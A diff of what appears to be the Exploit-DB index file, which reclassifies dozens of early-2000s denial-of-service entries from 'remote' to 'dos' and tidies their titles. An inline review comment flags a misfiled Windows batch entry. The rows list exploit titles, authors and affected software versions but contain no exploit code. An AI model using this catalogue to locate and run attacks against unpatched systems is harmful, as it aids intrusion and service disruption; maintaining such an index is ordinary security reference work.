 20683,platforms/cgi/remote/20683.txt,"Ikonboard 2.1.7 b Remote File Disclosure Vulnerability",2001-03-11,"Martin J. Muench",cgi,remote,0
 20684,platforms/solaris/local/20684.c,"Solaris 2.5/2.6/7.0/8 tip Buffer Overflow Vulnerability",2001-03-27,"Pablo Sor",solaris,local,0
 20685,platforms/multiple/remote/20685.txt,"IBM Net.Commerce 3.1/3.2 WebSphere Weak Password Vulnerability",2001-03-07,"Rudi Carell",multiple,remote,0
@@ -18036,13 +18036,13 @@ id,file,description,date,author,platform,type,port
 20725,platforms/cgi/remote/20725.txt,"Microburst uStorekeeper 1.x - Remote Arbitrary Commands Vulnerability",2001-04-02,"UkR hacking team",cgi,remote,0
 20726,platforms/windows/remote/20726.pl,"Gene6 BPFTP Server 2.0 File Existence Disclosure Vulnerability",2001-04-03,"Rob Beck",windows,remote,0
 20727,platforms/linux/remote/20727.c,"Ntpd Remote Buffer Overflow Vulnerability",2001-04-04,"babcia padlina ltd",linux,remote,0
-20728,platforms/windows/remote/20728.txt,"602Pro Lan Suite 2000a Long HTTP Request Denial of Service Vulnerability",2001-04-05,nitr0s,windows,remote,0
+20728,platforms/windows/dos/20728.txt,"602Pro Lan Suite 2000a - Long HTTP Request Denial of Service Vulnerability",2001-04-05,nitr0s,windows,dos,0
 20729,platforms/php/webapps/20729.txt,"PHP Nuke 1.0/2.5/3.0/4.x - Remote Ad Banner URL Change Vulnerability",2001-04-02,"Juan Diego",php,webapps,0
 20730,platforms/unix/remote/20730.c,"IPFilter 3.x Fragment Rule Bypass Vulnerability",2001-04-09,"Thomas Lopatic",unix,remote,0
 20731,platforms/bsd/remote/20731.c,"FreeBSD 2.2-4.2_NetBSD 1.2-4.5_OpenBSD 2.x ftpd glob() Buffer Overflow",2001-04-14,"fish stiqz",bsd,remote,0
 20732,platforms/freebsd/remote/20732.pl,"freebsd 4.2-stable ftpd glob() Buffer Overflow Vulnerabilities",2001-04-16,"Elias Levy",freebsd,remote,0
 20733,platforms/openbsd/remote/20733.c,"OpenBSD 2.x-2.8 ftpd glob() Buffer Overflow",2001-04-16,"Elias Levy",openbsd,remote,0
-20734,platforms/hardware/remote/20734.sh,"Cisco PIX 4.x/5.x TACACS+ Denial of Service Vulnerability",2001-04-06,"Claudiu Calomfirescu",hardware,remote,0
+20734,platforms/hardware/dos/20734.sh,"Cisco PIX 4.x/5.x TACACS+ - Denial of Service Vulnerability",2001-04-06,"Claudiu Calomfirescu",hardware,dos,0
 20735,platforms/sco/dos/20735.txt,"SCO OpenServer 5.0.6 lpadmin Buffer Overflow Vulnerability",2001-03-27,"Secure Network Operations",sco,dos,0
 20736,platforms/sco/dos/20736.txt,"SCO Open Server 5.0.6 lpforms Buffer Overflow Vulnerability",2001-03-27,"Secure Network Operations",sco,dos,0
 20737,platforms/sco/dos/20737.txt,"SCO Open Server 5.0.6 lpshut Buffer Overflow Vulnerability",2001-03-27,"Secure Network Operations",sco,dos,0
@@ -18061,7 +18061,7 @@ id,file,description,date,author,platform,type,port
 20750,platforms/linux/dos/20750.txt,"Trend Micro Interscan Viruswall (Linux) 3.0.1 - Multiple Program Buffer Overflow",2001-04-13,"eeye security",linux,dos,0
 20751,platforms/solaris/local/20751.txt,"Solaris 7.0/8 IPCS Timezone Buffer Overflow Vulnerability",2001-04-12,"Riley Hassell",solaris,local,0
 20752,platforms/cgi/remote/20752.txt,"NCM Content Management System content.pl Input Validation Vulnerability",2001-04-13,"RA-Soft Security",cgi,remote,0
-20753,platforms/cgi/remote/20753.txt,"IBM Websphere/Net.Commerce 3 CGI-BIN Macro Denial of Service Vulnerability",2001-04-13,"ET LoWNOISE",cgi,remote,0
+20753,platforms/cgi/dos/20753.txt,"IBM Websphere/Net.Commerce 3 - CGI-BIN Macro Denial of Service Vulnerability",2001-04-13,"ET LoWNOISE",cgi,dos,0
 20761,platforms/php/webapps/20761.txt,"Ad Manager Pro 4 - LFI",2012-08-23,CorryL,php,webapps,0
 20762,platforms/php/webapps/20762.php,"webpa <= 1.1.0.1 - Multiple Vulnerabilities",2012-08-24,dun,php,webapps,0
 20763,platforms/windows/dos/20763.c,"Microsoft ISA Server 2000 Web Proxy DoS Vulnerability",2001-04-16,"SecureXpert Labs",windows,dos,0
@@ -18088,7 +18088,7 @@ id,file,description,date,author,platform,type,port
 20780,platforms/cgi/remote/20780.c,"CrossWind CyberScheduler 2.1 websyncd Remote Buffer Overflow Vulnerability",2001-04-17,"Enrique A.",cgi,remote,0
 20781,platforms/linux/local/20781.txt,"SUSE 7.0 KFM Insecure TMP File Creation Vulnerability",2001-04-18,"Paul Starzetz",linux,local,0
 20782,platforms/windows/remote/20782.eml,"Microsoft Internet Explorer 5.0/5.5 and OE 5.5 XML Stylesheets Active Scripting Vulnerability",2001-04-20,"Georgi Guninski",windows,remote,0
-20783,platforms/windows/remote/20783.txt,"Rit Research Labs _The Bat!_ 1.x Missing Linefeeds DoS Vulnerability",2001-04-18,3APA3A,windows,remote,0
+20783,platforms/windows/dos/20783.txt,"Rit Research Labs _The Bat!_ 1.x - Missing Linefeeds DoS Vulnerability",2001-04-18,3APA3A,windows,dos,0
 20784,platforms/windows/dos/20784.cpp,"WireShark 1.8.2 & 1.6.0 - Buffer Overflow PoC (0day)",2012-08-24,X-h4ck,windows,dos,0
 20785,platforms/php/webapps/20785.txt,"Ad Manager Pro Multiple Vulnerabilities",2012-08-24,"Yakir Wizman",php,webapps,0
 20787,platforms/php/webapps/20787.txt,"Text Exchange Pro (index.php page) Local File Inclusion",2012-08-24,"Yakir Wizman",php,webapps,0
@@ -18106,7 +18106,7 @@ id,file,description,date,author,platform,type,port
 20799,platforms/cgi/remote/20799.c,"PowerScripts PlusMail WebConsole 1.0 Poor Authentication Vulnerability (1)",2000-01-11,"Synnergy Networks",cgi,remote,0
 20800,platforms/cgi/remote/20800.c,"PowerScripts PlusMail WebConsole 1.0 Poor Authentication Vulnerability (2)",2000-01-11,missnglnk,cgi,remote,0
 20801,platforms/cgi/remote/20801.c,"PowerScripts PlusMail WebConsole 1.0 Poor Authentication Vulnerability (3)",2000-01-20,ytcracker,cgi,remote,0
-20802,platforms/windows/remote/20802.c,"Microsoft IIS 2.0/3.0 Long URL Denial of Service Vulnerability",1997-06-21,"Andrea Arcangeli",windows,remote,0
+20802,platforms/windows/dos/20802.c,"Microsoft IIS 2.0/3.0 - Long URL Denial of Service Vulnerability",1997-06-21,"Andrea Arcangeli",windows,dos,0
 20803,platforms/windows/remote/20803.txt,"raidenftpd 2.1 - Directory Traversal Vulnerability",2001-04-25,joetesta,windows,remote,0
 20804,platforms/irix/local/20804.c,"IRIX 5.3/6.x - 'netprint' Arbitrary Shared Library Usage Vulnerability",2001-04-26,V9,irix,local,0
 20805,platforms/irix/remote/20805.c,"SGI IRIX 3/4/5/6_OpenLinux 1.0/1.1 - routed traceon Vulnerability",1998-10-21,Rootshell,irix,remote,0
@@ -18114,11 +18114,11 @@ id,file,description,date,author,platform,type,port
 20807,platforms/multiple/remote/20807.txt,"datawizard webxq 2.1.204 - Directory Traversal Vulnerability",2001-04-27,joetesta,multiple,remote,0
 20808,platforms/cgi/remote/20808.txt,"PerlCal 2.x - Directory Traversal Vulnerability",2001-04-27,ThePike,cgi,remote,0
 20809,platforms/cgi/remote/20809.html,"Excite for Web Servers 1.1 Administrative Password Vulnerability",1998-11-30,"Michael Gerdts",cgi,remote,0
-20810,platforms/multiple/remote/20810.c,"FreeBSD 2.x_HP-UX 9/10/11_kernel 2.0.3_Windows NT 4.0/Server 2003_NetBSD 1 loopback (land.c) DoS (1)",1997-11-20,m3lt,multiple,remote,0
-20811,platforms/multiple/remote/20811.cpp,"FreeBSD 2.x_HP-UX 9/10/11_kernel 2.0.3_Windows NT 4.0/Server 2003_NetBSD 1 loopback (land.c) DoS (2)",1997-11-20,"Konrad Malewski",multiple,remote,0
-20812,platforms/windows/remote/20812.c,"FreeBSD 2.x_HP-UX 9/10/11_kernel 2.0.3_Windows NT 4.0/Server 2003_NetBSD 1 loopback (land.c) DoS (3)",1997-11-20,m3lt,windows,remote,0
-20813,platforms/multiple/remote/20813.c,"FreeBSD 2.x_HP-UX 9/10/11_kernel 2.0.3_Windows NT 4.0/Server 2003_NetBSD 1 loopback (land.c) DoS (4)",1997-11-20,MondoMan,multiple,remote,0
-20814,platforms/windows/remote/20814.c,"FreeBSD 2.x_HP-UX 9/10/11_kernel 2.0.3_Windows NT 4.0/Server 2003_NetBSD 1 loopback (land.c) DoS (5)",1997-11-20,"Dejan Levaja",windows,remote,0
+20810,platforms/multiple/dos/20810.c,"FreeBSD 2.x_HP-UX 9/10/11_kernel 2.0.3_Windows NT 4.0/Server 2003_NetBSD 1 - loopback (land.c) DoS (1)",1997-11-20,m3lt,multiple,dos,0
+20811,platforms/multiple/dos/20811.cpp,"FreeBSD 2.x_HP-UX 9/10/11_kernel 2.0.3_Windows NT 4.0/Server 2003_NetBSD 1 - loopback (land.c) DoS (2)",1997-11-20,"Konrad Malewski",multiple,dos,0
+20812,platforms/windows/dos/20812.c,"FreeBSD 2.x_HP-UX 9/10/11_kernel 2.0.3_Windows NT 4.0/Server 2003_NetBSD 1 - loopback (land.c) DoS (3)",1997-11-20,m3lt,windows,dos,0
+20813,platforms/multiple/dos/20813.c,"FreeBSD 2.x_HP-UX 9/10/11_kernel 2.0.3_Windows NT 4.0/Server 2003_NetBSD 1 - loopback (land.c) DoS (4)",1997-11-20,MondoMan,multiple,dos,0
+20814,platforms/windows/dos/20814.c,"FreeBSD 2.x_HP-UX 9/10/11_kernel 2.0.3_Windows NT 4.0/Server 2003_NetBSD 1 - loopback (land.c) DoS (5)",1997-11-20,"Dejan Levaja",windows,dos,0
 20815,platforms/windows/remote/20815.pl,"Microsoft IIS 5.0 - (.printer) ISAPI Extension Buffer Overflow Vulnerability (1)",2001-05-01,storm,windows,remote,0
 20816,platforms/windows/remote/20816.c,"Microsoft IIS 5.0 - (.printer) ISAPI Extension Buffer Overflow Vulnerability (2)",2001-05-01,"dark spyrit",windows,remote,0
 20817,platforms/windows/remote/20817.c,"Microsoft IIS 5.0 - (.printer) ISAPI Extension Buffer Overflow Vulnerability (3)",2005-02-02,styx,windows,remote,0
@@ -18134,7 +18134,7 @@ id,file,description,date,author,platform,type,port
 20827,platforms/multiple/dos/20827.pl,"Hughes Technologies DSL_Vdns 1.0 - Denial of Service Vulnerability",2001-05-07,neme-dhc,multiple,dos,0
 20828,platforms/windows/dos/20828.txt,"SpyNet 6.5 Chat Server Multiple Connection Denial of Service Vulnerability",2001-05-07,nemesystm,windows,dos,0
 20829,platforms/windows/remote/20829.txt,"T. Hauck Jana Server 1.45/1.46 Hex Encoded Directory Traversal Vulnerability",2001-05-07,neme-dhc,windows,remote,0
-20830,platforms/windows/remote/20830.txt,"T. Hauck Jana Server 1.45/1.46/2.0 MS-DOS Device Name DoS Vulnerability",2001-05-07,neme-dhc,windows,remote,0
+20830,platforms/windows/dos/20830.txt,"T. Hauck Jana Server 1.45/1.46/2.0 - MS-DOS Device Name DoS Vulnerability",2001-05-07,neme-dhc,windows,dos,0
 20831,platforms/cgi/remote/20831.txt,"Drummond Miles A1Stats 1.0 a1disp2.cgi Traversal Arbitrary File Read",2001-05-07,neme-dhc,cgi,remote,0
 20832,platforms/cgi/remote/20832.txt,"Drummond Miles A1Stats 1.0 a1disp3.cgi Traversal Arbitrary File Read",2001-05-07,neme-dhc,cgi,remote,0
 20833,platforms/cgi/remote/20833.txt,"Drummond Miles A1Stats 1.0 a1disp4.cgi Traversal Arbitrary File Read",2001-05-07,neme-dhc,cgi,remote,0
@@ -18149,7 +18149,7 @@ id,file,description,date,author,platform,type,port
 20842,platforms/windows/remote/20842.txt,"Microsoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (8)",2001-05-15,Roelof,windows,remote,0
 20843,platforms/linux/local/20843.txt,"Immunix OS 6.2/7.0_ Redhat 5.2/6.2/7.0_ S.u.S.E 6.x/7.0/7.1 Man -S - Heap Overflow",2001-05-13,"zenith parsec",linux,local,0
 20844,platforms/osx/dos/20844.txt,"Apple Personal Web Sharing 1.1/1.5/1.5.5 - Remote DoS Vulnerability",2001-05-10,"Jass Seljamaa",osx,dos,0
-20845,platforms/osx/remote/20845.txt,"Maxum Rumpus FTP Server 1.3.2/1.3.4/2.0.3 dev Remote DoS",2001-05-15,"Jass Seljamaa",osx,remote,0
+20845,platforms/osx/dos/20845.txt,"Maxum Rumpus FTP Server 1.3.2/1.3.4/2.0.3 dev - Remote DoS",2001-05-15,"Jass Seljamaa",osx,dos,0
 20846,platforms/windows/dos/20846.pl,"Microsoft IIS 4.0/5.0 FTP Denial of Service Vulnerability",2000-05-14,"Nelson Bunker",windows,dos,0
 20847,platforms/hardware/dos/20847.c,"3Com OfficeConnect DSL Router 812 1.1.7/840 1.1.7 HTTP Port Router DoS",2001-09-21,Sniffer,hardware,dos,0
 20848,platforms/php/webapps/20848.txt,"PHPSlash 0.5.3 2/0.6.1 URL Block Arbitrary File Disclosure Vulnerability",2001-04-15,"tobozo tagada",php,webapps,0
@@ -18205,7 +18205,7 @@ id,file,description,date,author,platform,type,port
 20901,platforms/linux/local/20901.c,"Sudo 1.5/1.6 Heap Corruption Vulnerability",2001-02-22,MaXX,linux,local,0
 20902,platforms/linux/remote/20902.c,"PKCrew TIAtunnel 0.9 alpha2 - Authentication Mechanism Buffer Overflow Vulnerability",2001-06-05,qitest1,linux,remote,0
 20903,platforms/windows/remote/20903.html,"Microsoft Internet Explorer 5.5 File Disclosure Vulnerability",2001-03-31,"Georgi Guninski",windows,remote,0
-20904,platforms/windows/remote/20904.pl,"Pragma Systems InterAccess TelnetD Server 4.0 - Denial of Service",2001-06-06,nemesystm,windows,remote,0
+20904,platforms/windows/dos/20904.pl,"Pragma Systems InterAccess TelnetD Server 4.0 - Denial of Service",2001-06-06,nemesystm,windows,dos,0
 20905,platforms/unix/local/20905.txt,"Thibault Godouet FCron 1 Symbolic Link Vulnerability",2001-06-07,"Uwe Ohse",unix,local,0
 20906,platforms/unix/local/20906.c,"kosch suid wrapper 1.1.1 - Buffer Overflow Vulnerability",2001-06-07,dex,unix,local,0
 20907,platforms/windows/dos/20907.sh,"Microsoft Windows 2000 Telnet Username DoS Vulnerability",2001-06-07,"Michal Zalewski",windows,dos,0
@@ -18270,7 +18270,7 @@ id,file,description,date,author,platform,type,port
 20970,platforms/solaris/local/20970.c,"Solaris 8 libsldap Buffer Overflow Vulnerability (2)",2001-06-27,Fyodor,solaris,local,0
 20971,platforms/windows/dos/20971.txt,"Adobe Photoshop CS6 - PNG Parsing Heap Overflow",2012-09-01,"Francis Provencher",windows,dos,0
 20972,platforms/multiple/remote/20972.txt,"Icecast 1.1.x/1.3.x - Directory Traversal Vulnerability",2001-06-26,gollum,multiple,remote,0
-20973,platforms/multiple/remote/20973.txt,"Icecast 1.1.x/1.3.x Slash File Name Denial of Service Vulnerability",2001-06-26,gollum,multiple,remote,0
+20973,platforms/multiple/dos/20973.txt,"Icecast 1.1.x/1.3.x - Slash File Name Denial of Service Vulnerability",2001-06-26,gollum,multiple,dos,0
 20974,platforms/solaris/local/20974.c,"Solaris 2.6/2.6/7.0/8 whodo Buffer Overflow Vulnerability",2001-06-01,"Pablo Sor",solaris,local,0
 20975,platforms/hardware/remote/20975.pl,"Cisco IOS 11.x/12.x HTTP Configuration Arbitrary Administrative Access Vulnerability (1)",2001-06-27,cronos,hardware,remote,0
 20976,platforms/hardware/remote/20976.c,"Cisco IOS 11.x/12.x HTTP Configuration Arbitrary Administrative Access Vulnerability (2)",2001-06-27,"Eliel C. Sardanons",hardware,remote,0
@@ -18312,7 +18312,7 @@ id,file,description,date,author,platform,type,port
 21012,platforms/multiple/dos/21012.c,"ID Software Quake 1.9 - Denial of Service Vulnerability",2001-07-17,"Andy Gavin",multiple,dos,0
 21014,platforms/linux/local/21014.c,"Slackware 7.0/7.1/8.0 - Manual Page Cache File Creation Vulnerability",2001-07-17,josh,linux,local,0
 21015,platforms/hardware/remote/21015.pl,"Check Point Firewall-1 4 SecureRemote Network Information Leak Vulnerability",2001-07-17,"Haroon Meer & Roelof Temmingh",hardware,remote,0
-21016,platforms/windows/remote/21016.c,"ID Software Quake 3 - _smurf attack_ Denial of Service Vulnerability",2001-07-17,"Andy Gavin",windows,remote,0
+21016,platforms/windows/dos/21016.c,"ID Software Quake 3 - _smurf attack_ Denial of Service Vulnerability",2001-07-17,"Andy Gavin",windows,dos,0
 21019,platforms/linux/remote/21019.txt,"Horde 1.2.x/2.1.3 and Imp 2.2.x/3.1.2 File Disclosure Vulnerability",2001-07-13,"Caldera Open Linux",linux,remote,0
 21020,platforms/multiple/local/21020.c,"NetWin DMail 2.x_SurgeFTP 1.0/2.0 Weak Password Encryption Vulnerability",2001-07-20,byterage,multiple,local,0
 21021,platforms/unix/remote/21021.pl,"SSH2 3.0 Short Password Login Vulnerability",2001-07-21,hypoclear,unix,remote,0
@@ -18333,7 +18333,7 @@ id,file,description,date,author,platform,type,port
 21037,platforms/linux/remote/21037.c,"GNU groff 1.1x xploitation Via LPD Vulnerability",2001-06-23,zen-parse,linux,remote,0
 21038,platforms/php/webapps/21038.txt,"PHP Nuke 5.0 - 'user.php' Form Element Substitution Vulnerabilty",2001-07-27,dinopio,php,webapps,0
 21039,platforms/windows/remote/21039.pl,"SimpleServer:WWW 1.0.7/1.0.8/1.13 Hex Encoded URL Directory Traversal Vulnerability",2001-07-26,THRAN,windows,remote,0
-21040,platforms/windows/remote/21040.txt,"Windows 98 ARP Denial of Service Vulnerability",2001-07-30,"Paul Starzetz",windows,remote,0
+21040,platforms/windows/dos/21040.txt,"Microsoft Windows 98 - ARP Denial of Service Vulnerability",2001-07-30,"Paul Starzetz",windows,dos,0
 21042,platforms/multiple/dos/21042.txt,"id Software Quake 3 Arena Server 1.29 Possible Buffer Overflow Vulnerability",2001-07-29,Coolest,multiple,dos,0
 21043,platforms/linux/local/21043.c,"GNU findutils 4.0/4.1 Locate Arbitrary Command Execution Vulnerability",2001-08-01,"Josh Smith",linux,local,0
 21044,platforms/windows/local/21044.c,"Oracle 8/9i DBSNMP Oracle Home Environment Variable Buffer Overflow",2001-08-02,"Juan Manuel Pascual Escribá",windows,local,0
@@ -18368,7 +18368,7 @@ id,file,description,date,author,platform,type,port
 21074,platforms/unix/dos/21074.pl,"glFTPD 1.x LIST Denial of Service Vulnerability",2001-08-17,"ASGUARD LABS",unix,dos,0
 21075,platforms/linux/remote/21075.txt,"SuSE 6.3/6.4/7.0 sdb Arbitrary Command Execution Vulnerability",2001-08-02,"Maurycy Prodeus ",linux,remote,0
 21076,platforms/osx/local/21076.txt,"Intego FileGuard 2.0/4.0 Weak Password Encryption Vulnerability",2001-08-20,MacSec,osx,local,0
-21077,platforms/bsd/local/21077.c,"BSDI 3.0/3.1 Possible Local Kernel Denial of Service Vulnerability",2001-08-21,V9,bsd,local,0
+21077,platforms/bsd/dos/21077.c,"BSDI 3.0/3.1 - Possible Local Kernel Denial of Service Vulnerability",2001-08-21,V9,bsd,dos,0
 21078,platforms/multiple/local/21078.txt,"Respondus for WebCT 1.1.2 Weak Password Encryption Vulnerability",2001-08-23,"Desmond Irvine",multiple,local,0
 21079,platforms/php/webapps/21079.rb,"MobileCartly 1.0 - Arbitrary File Creation Vulnerability",2012-09-05,metasploit,php,webapps,0
 21080,platforms/multiple/remote/21080.rb,"JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet)",2012-09-05,metasploit,multiple,remote,0
@@ -18452,7 +18452,7 @@ id,file,description,date,author,platform,type,port
 21164,platforms/windows/remote/21164.txt,"Microsoft Internet Explorer 5.5/6.0 Spoofable File Extensions Vulnerability",2001-11-26,StatiC,windows,remote,0
 21165,platforms/php/webapps/21165.txt,"PHPNuke 1.0/2.5/3.0/4.x/5.x/6.x/7.x user.php uname Parameter XSS Vulnerability",2001-12-03,"Cabezon Aurélien",php,webapps,0
 21166,platforms/php/webapps/21166.txt,"PHPNuke 1.0/2.5/3.0/4.x/5.x/6.x/7.x modules.php Multiple Parameter XSS Vulnerability",2001-12-03,"Cabezon Aurélien",php,webapps,0
-21167,platforms/openbsd/local/21167.c,"OpenBSD 2.x/3.0 User Mode Return Value Denial of Service Vulnerability",2001-12-03,"Marco Peereboom",openbsd,local,0
+21167,platforms/openbsd/dos/21167.c,"OpenBSD 2.x/3.0 - User Mode Return Value Denial of Service Vulnerability",2001-12-03,"Marco Peereboom",openbsd,dos,0
 21168,platforms/php/webapps/21168.txt,"EasyNews 1.5 NewsDatabase/Template Modification Vulnerability",2001-12-01,"markus arndt",php,webapps,0
 21169,platforms/windows/remote/21169.txt,"ZoneAlarm Pro 1.0/2.x Outbound Packet Bypass Vulnerability",2001-12-06,"Tom Liston",windows,remote,0
 21170,platforms/windows/dos/21170.txt,"Volition Red Faction 1.0/1.1 Game Server/Client Denial of Service Vulnerability",2001-12-07,sh0,windows,dos,0
@@ -18513,7 +18513,7 @@ id,file,description,date,author,platform,type,port
 21225,platforms/windows/remote/21225.c,"John Roy Pi3Web 2.0 For Windows Long Request Buffer Overflow Vulnerability",2002-01-14,aT4r,windows,remote,0
 21226,platforms/linux/local/21226.c,"IMLib2 Home Environment Variable Buffer Overflow Vulnerability",2002-01-13,"Charles Stevenson",linux,local,0
 21227,platforms/linux/local/21227.sh,"Sudo 1.6.3 Unclean Environment Variable Root Program Execution Vulnerability",2002-01-14,"Charles Stevenson",linux,local,0
-21228,platforms/windows/remote/21228.c,"Sambar Server 5.1 Sample Script Denial of Service Vulnerability",2002-02-06,"Tamer Sahin",windows,remote,0
+21228,platforms/windows/dos/21228.c,"Sambar Server 5.1 - Sample Script Denial of Service Vulnerability",2002-02-06,"Tamer Sahin",windows,dos,0
 21229,platforms/linux/local/21229.txt,"AT 3.1.8 - Formatted Time Heap Overflow Vulnerability",2002-01-16,"SuSE Security",linux,local,0
 21230,platforms/php/webapps/21230.txt,"PHPNuke 4.x/5.x - Remote Arbitrary File Include Vulnerability",2002-01-16,"Handle Nopman",php,webapps,0
 21231,platforms/linux/local/21231.c,"Chinput 3.0 Environment Variable Buffer Overflow Vulnerability",2002-01-16,xperc,linux,local,0
@@ -18544,8 +18544,8 @@ id,file,description,date,author,platform,type,port
 21258,platforms/linux/local/21258.bat,"Microsoft Windows 2000/NT 4 NTFS File Hiding Vulnerability",2002-01-29,"Hans Somers",linux,local,0
 21259,platforms/linux/local/21259.java,"Sun Java Virtual Machine 1.2.2/1.3.1 Segmentation Violation Vulnerability",2002-01-30,"Taeho Oh",linux,local,0
 21260,platforms/windows/remote/21260.txt,"Microsoft Site Server 3.0 - Cross-Site Scripting Vulnerability",2002-01-29,"rain forest puppy",windows,remote,0
-21261,platforms/unix/remote/21261.txt,"Tru64 Malformed TCP Packet Denial of Service Vulnerability",2002-01-31,"Luca Papotti",unix,remote,0
-21262,platforms/linux/remote/21262.txt,"kicq 2.0.0b1 Invalid ICQ Packet Denial of Service Vulnerability",2002-02-02,"Rafael San Miguel Carrasco",linux,remote,0
+21261,platforms/unix/dos/21261.txt,"Tru64 - Malformed TCP Packet Denial of Service Vulnerability",2002-01-31,"Luca Papotti",unix,dos,0
+21262,platforms/linux/dos/21262.txt,"kicq 2.0.0b1 - Invalid ICQ Packet Denial of Service Vulnerability",2002-02-02,"Rafael San Miguel Carrasco",linux,dos,0
 21263,platforms/cgi/remote/21263.txt,"Faq-O-Matic 2.6/2.7 - Cross-Site Scripting Vulnerability",2002-02-04,superpetz,cgi,remote,0
 21264,platforms/php/remote/21264.php,"PHP 4.x/5.x MySQL Safe_Mode Filesystem Circumvention Vulnerability (1)",2002-02-03,"Dave Wilson",php,remote,0
 21265,platforms/php/remote/21265.php,"PHP 4.x/5.x MySQL Safe_Mode Filesystem Circumvention Vulnerability (2)",2002-02-03,anonymous,php,remote,0
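Review bot: The untouched context row `21258,platforms/linux/local/21258.bat,"Microsoft Windows 2000/NT 4 NTFS File Hiding Vulnerability",...,linux,local,0` in this hunk files a Windows batch script under the `linux` platform, which looks like the same kind of metadata error this commit is fixing for 21261 and 21262 right below it. If the entry really is a Windows-only script, the row presumably wants `platforms/windows/local/21258.bat` and platform `windows`, but that should be confirmed against the file's contents rather than inferred from the extension. This is pre-existing and not introduced by the change; I am only flagging it because it sits inside the hunk being edited.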
@@ -18588,9 +18588,9 @@ id,file,description,date,author,platform,type,port
 21302,platforms/linux/local/21302.c,"Century Software Term For Linux 6.27.869 Command Line Buffer Overflow",2002-02-25,"Haiku Hacker",linux,local,0
 21303,platforms/windows/remote/21303.txt,"Working Resources BadBlue 1.5/1.6 Triple-Dot-Slash Directory Traversal Vulnerability",2002-02-26,"Strumpf Noir Society",windows,remote,0
 21304,platforms/php/webapps/21304.txt,"Ikonboard 2.17/3.0/3.1 Image Tag Cross-Agent Scripting Vulnerability",2002-02-26,godminus,php,webapps,0
-21305,platforms/windows/remote/21305.c,"Galacticomm Worldgroup 3.20 - Remote FTP Denial of Service Vulnerability",2002-02-27,"Limpid Byte",windows,remote,0
-21306,platforms/windows/remote/21306.c,"Galacticomm Worldgroup 3.20 - Remote Web Server Denial of Service Vulnerability",2002-02-27,"Limpid Byte",windows,remote,0
-21307,platforms/windows/remote/21307.txt,"Rit Research Labs The Bat! 1.53 Microsoft DoS Device Name Denial of Service Vulnerability",2002-02-27,3APA3A,windows,remote,0
+21305,platforms/windows/dos/21305.c,"Galacticomm Worldgroup 3.20 - Remote FTP Denial of Service Vulnerability",2002-02-27,"Limpid Byte",windows,dos,0
+21306,platforms/windows/dos/21306.c,"Galacticomm Worldgroup 3.20 - Remote Web Server Denial of Service Vulnerability",2002-02-27,"Limpid Byte",windows,dos,0
+21307,platforms/windows/dos/21307.txt,"Rit Research Labs The Bat! 1.53 - Microsoft DoS Device Name Denial of Service Vulnerability",2002-02-27,3APA3A,windows,dos,0
 21308,platforms/asp/webapps/21308.txt,"Snitz Forums 2000 3.0/3.1/3.3 Image Tag Cross-Agent Scripting Vulnerability",2002-02-27,Justin,asp,webapps,0
 21309,platforms/linux/remote/21309.c,"xtell 1.91.1/2.6.1 - Multiple Remote Buffer Overflow Vulnerabilities",2002-02-27,spybreak,linux,remote,0
 21310,platforms/linux/remote/21310.txt,"xtell 2.6.1 User Status Remote Information Disclosure Vulnerability",2002-02-27,spybreak,linux,remote,0
@@ -18705,7 +18705,7 @@ id,file,description,date,author,platform,type,port
 21425,platforms/php/webapps/21425.txt,"DNSTools 2.0 - Authentication Bypass Vulnerability",2002-04-28,ppp-design,php,webapps,0
 21426,platforms/php/webapps/21426.txt,"Blahz-DNS 0.2 Direct Script Call Authentication Bypass Vulnerability",2002-04-28,ppp-design,php,webapps,0
 21427,platforms/php/webapps/21427.txt,"MiniBB 1.2 - Cross-Site Scripting Vulnerability",2002-04-17,frog,php,webapps,0
-21428,platforms/php/webapps/21428.txt,"Messagerie 1.0 - Arbitrary User Removal DoS Vulnerability",2002-04-27,frog,php,webapps,0
+21428,platforms/php/dos/21428.txt,"Messagerie 1.0 - Arbitrary User Removal DoS Vulnerability",2002-04-27,frog,php,dos,0
 21429,platforms/windows/dos/21429.c,"3CDaemon 2.0 - Buffer Overflow Vulnerability (1)",2002-04-15,"MaD SKiLL",windows,dos,0
 22216,platforms/php/webapps/22216.txt,"bitweaver 2.8.1 - Multiple Vulnerabilities",2012-10-24,"Trustwave's SpiderLabs",php,webapps,0
 21431,platforms/irix/dos/21431.txt,"IRIX 6.5.x Performance Co-Pilot Remote Denial of Service Vulnerability",2002-04-12,"Marcelo Magnasco",irix,dos,0
@@ -18881,7 +18881,7 @@ id,file,description,date,author,platform,type,port
 21602,platforms/linux/remote/21602.txt,"icecast server 1.3.12 - Directory Traversal information disclosure Vulnerability",2002-07-09,glaive,linux,remote,0
 21603,platforms/multiple/remote/21603.txt,"iPlanet Web Server 4.1 - Search Component File Disclosure Vulnerability",2002-07-09,"Qualys Corporation",multiple,remote,0
 21604,platforms/linux/remote/21604.txt,"Apache Tomcat 4.0.3 - Servlet Mapping Cross-Site Scripting Vulnerability",2002-07-10,"Matt Moore",linux,remote,0
-21605,platforms/windows/remote/21605.txt,"Apache Tomcat 4.0.3 - DoS Device Name Cross-Site Scripting Vulnerability",2002-07-10,"Matt Moore",windows,remote,0
+21605,platforms/windows/remote/21605.txt,"Apache Tomcat 4.0.3 - DoS Device Name & Cross-Site Scripting Vulnerability",2002-07-10,"Matt Moore",windows,remote,0
 21606,platforms/windows/remote/21606.txt,"Microsoft Internet Explorer 5/6 OBJECT Tag Same Origin Policy Violation Vulnerability",2002-07-10,"Thor Larholm",windows,remote,0
 21607,platforms/windows/remote/21607.txt,"GoAhead WebServer 2.1.x URL Encoded Slash Directory Traversal Vulnerability",2002-07-10,"Matt Moore",windows,remote,0
 21608,platforms/windows/remote/21608.txt,"GoAhead WebServer 2.1.x Error Page Cross-Site Scripting Vulnerability",2002-07-10,"Matt Moore",windows,remote,0
@@ -18928,7 +18928,7 @@ id,file,description,date,author,platform,type,port
 21649,platforms/multiple/remote/21649.txt,"CacheFlow CacheOS 3.1.x/4.0.x/4.1 Unresolved Domain Cross-Site Scripting Vulnerability",2002-07-24,T.Suzuki,multiple,remote,0
 21651,platforms/windows/remote/21651.txt,"Microsoft SQL Server 2000 sp_MScopyscript SQL Injection Vulnerability",2002-07-25,"Cesar Cerrudo",windows,remote,0
 21652,platforms/windows/remote/21652.cpp,"Microsoft SQL Server 2000 Resolution Service Heap Overflow Vulnerability",2002-07-25,"David Litchfield",windows,remote,0
-21653,platforms/windows/remote/21653.c,"KaZaA Media Desktop 1.7.1 Large Message Denial of Service Vulnerability",2002-07-25,"Josh and omega",windows,remote,0
